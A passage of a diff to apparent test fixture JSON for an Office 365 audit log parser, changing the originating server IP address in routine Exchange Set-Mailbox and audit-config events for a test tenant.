Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{E9F19AD5-5B1D-4361-BE94-E55A6E1A6AA3}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{E9F19AD5-5B1D-4361-BE94-E55A6E1A6AA3}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}" + "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:15\",\"ExternalAccess\":true,\"Id\":\"ebda487f-6177-432a-e91d-08d7adfc0d0d\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{E9F19AD5-5B1D-4361-BE94-E55A6E1A6AA3}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{E9F19AD5-5B1D-4361-BE94-E55A6E1A6AA3}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}" }, "o365audit": { "AppId": "", @@ -3792,7 +3792,7 @@ "Operation": "Set-Mailbox", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "OrganizationName": "testsiem.onmicrosoft.com", - "OriginatingServer": "HE1PR0102MB3228 (15.20.207.17)", + "OriginatingServer": "HE1PR0102MB3228 (67.43.156.13)", "Parameters": [ { "Name": "RecoverableItemsQuota", @@ -3866,7 +3866,7 @@ }, { "event": { - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:48:51\",\"ExternalAccess\":true,\"Id\":\"93d5f028-263c-45f1-dcf9-08d7ac0f2378\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/FederatedEmail.4c1f4d8b-8179-4148-93bf-00a95fa1e042\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"DisplayName\",\"Value\":\"Microsoft Exchange\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"10 GB (10,737,418,240 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"9 GB (9,663,676,416 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/FederatedEmail.4c1f4d8b-8179-4148-93bf-00a95fa1e042\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"10 GB (10,737,418,240 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}" + "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:48:51\",\"ExternalAccess\":true,\"Id\":\"93d5f028-263c-45f1-dcf9-08d7ac0f2378\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/FederatedEmail.4c1f4d8b-8179-4148-93bf-00a95fa1e042\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"DisplayName\",\"Value\":\"Microsoft Exchange\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"10 GB (10,737,418,240 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"9 GB (9,663,676,416 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/FederatedEmail.4c1f4d8b-8179-4148-93bf-00a95fa1e042\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"10 GB (10,737,418,240 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}" }, "o365audit": { "AppId": "", @@ -3878,7 +3878,7 @@ "Operation": "Set-Mailbox", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "OrganizationName": "testsiem.onmicrosoft.com", - "OriginatingServer": "HE1PR0102MB3228 (15.20.207.17)", + "OriginatingServer": "HE1PR0102MB3228 (67.43.156.13)", "Parameters": [ { "Name": "RecoverableItemsQuota", @@ -3952,7 +3952,7 @@ }, { "event": { - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:17\",\"ExternalAccess\":true,\"Id\":\"1eea5379-4c86-4d6f-00cf-08d7adfc0e23\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{61D4A3E5-D6B5-401C-B13A-CCAD2BA8E8E9}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{61D4A3E5-D6B5-401C-B13A-CCAD2BA8E8E9}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}" + "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:17\",\"ExternalAccess\":true,\"Id\":\"1eea5379-4c86-4d6f-00cf-08d7adfc0e23\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{61D4A3E5-D6B5-401C-B13A-CCAD2BA8E8E9}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{61D4A3E5-D6B5-401C-B13A-CCAD2BA8E8E9}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}" }, "o365audit": { "AppId": "", @@ -3964,7 +3964,7 @@ "Operation": "Set-Mailbox", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "OrganizationName": "testsiem.onmicrosoft.com", - "OriginatingServer": "HE1PR0102MB3228 (15.20.207.17)", + "OriginatingServer": "HE1PR0102MB3228 (67.43.156.13)", "Parameters": [ { "Name": "RecoverableItemsQuota", @@ -4038,7 +4038,7 @@ }, { "event": { - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:17\",\"ExternalAccess\":true,\"Id\":\"2202ec45-7abc-49dd-e35e-08d7adfc0e15\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{E9F19AD5-5B1D-4361-BE94-E55A6E1A6AA3}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{E9F19AD5-5B1D-4361-BE94-E55A6E1A6AA3}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}" + "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:17\",\"ExternalAccess\":true,\"Id\":\"2202ec45-7abc-49dd-e35e-08d7adfc0e15\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{E9F19AD5-5B1D-4361-BE94-E55A6E1A6AA3}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{E9F19AD5-5B1D-4361-BE94-E55A6E1A6AA3}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}" }, "o365audit": { "AppId": "", @@ -4050,7 +4050,7 @@ "Operation": "Set-Mailbox", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "OrganizationName": "testsiem.onmicrosoft.com", - "OriginatingServer": "HE1PR0102MB3228 (15.20.207.17)", + "OriginatingServer": "HE1PR0102MB3228 (67.43.156.13)", "Parameters": [ { "Name": "RecoverableItemsQuota", @@ -4124,7 +4124,7 @@ }, { "event": { - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:23\",\"ExternalAccess\":true,\"Id\":\"80d8b808-c24c-4359-24cf-08d7adfc11e3\",\"ObjectId\":\"testsiem.onmicrosoft.com\\\\Recipient Quota Policy\",\"Operation\":\"Set-RecipientEnforcementProvisioningPolicy\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"DomainController\",\"Value\":\"\"},{\"Name\":\"IgnoreDehydratedFlag\",\"Value\":\"True\"},{\"Name\":\"Identity\",\"Value\":\"testsiem.onmicrosoft.com\\\\Recipient Quota Policy\"},{\"Name\":\"PublicFolderHierarchyMailboxCountQuota\",\"Value\":\"100\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}" + "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:23\",\"ExternalAccess\":true,\"Id\":\"80d8b808-c24c-4359-24cf-08d7adfc11e3\",\"ObjectId\":\"testsiem.onmicrosoft.com\\\\Recipient Quota Policy\",\"Operation\":\"Set-RecipientEnforcementProvisioningPolicy\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"DomainController\",\"Value\":\"\"},{\"Name\":\"IgnoreDehydratedFlag\",\"Value\":\"True\"},{\"Name\":\"Identity\",\"Value\":\"testsiem.onmicrosoft.com\\\\Recipient Quota Policy\"},{\"Name\":\"PublicFolderHierarchyMailboxCountQuota\",\"Value\":\"100\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}" }, "o365audit": { "AppId": "", @@ -4136,7 +4136,7 @@ "Operation": "Set-RecipientEnforcementProvisioningPolicy", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "OrganizationName": "testsiem.onmicrosoft.com", - "OriginatingServer": "HE1PR0102MB3228 (15.20.207.17)", + "OriginatingServer": "HE1PR0102MB3228 (67.43.156.13)", "Parameters": [ { "Name": "DomainController", @@ -4166,7 +4166,7 @@ }, { "event": { - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:24\",\"ExternalAccess\":true,\"Id\":\"9edbf9fe-f844-401f-e9ec-08d7adfc1242\",\"ObjectId\":\"testsiem.onmicrosoft.com\\\\Admin Audit Log Settings\",\"Operation\":\"Set-AdminAuditLogConfig\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"DomainController\",\"Value\":\"\"},{\"Name\":\"IgnoreDehydratedFlag\",\"Value\":\"True\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com\"},{\"Name\":\"AdminAuditLogEnabled\",\"Value\":\"True\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}" + "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:24\",\"ExternalAccess\":true,\"Id\":\"9edbf9fe-f844-401f-e9ec-08d7adfc1242\",\"ObjectId\":\"testsiem.onmicrosoft.com\\\\Admin Audit Log Settings\",\"Operation\":\"Set-AdminAuditLogConfig\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"DomainController\",\"Value\":\"\"},{\"Name\":\"IgnoreDehydratedFlag\",\"Value\":\"True\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com\"},{\"Name\":\"AdminAuditLogEnabled\",\"Value\":\"True\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}" }, "o365audit": { "AppId": "", @@ -4178,7 +4178,7 @@ "Operation": "Set-AdminAuditLogConfig", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "OrganizationName": "testsiem.onmicrosoft.com", - "OriginatingServer": "HE1PR0102MB3228 (15.20.207.17)", + "OriginatingServer": "HE1PR0102MB3228 (67.43.156.13)", "Parameters": [ { "Name": "DomainController", @@ -4208,7 +4208,7 @@ }, { "event": { - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:15\",\"ExternalAccess\":true,\"Id\":\"7b5e608f-0a09-4251-8922-08d7adfc0d15\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{505B6405-958B-45A0-BAAE-76A0D7ACAE83}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{505B6405-958B-45A0-BAAE-76A0D7ACAE83}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}" + "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:15\",\"ExternalAccess\":true,\"Id\":\"7b5e608f-0a09-4251-8922-08d7adfc0d15\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{505B6405-958B-45A0-BAAE-76A0D7ACAE83}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 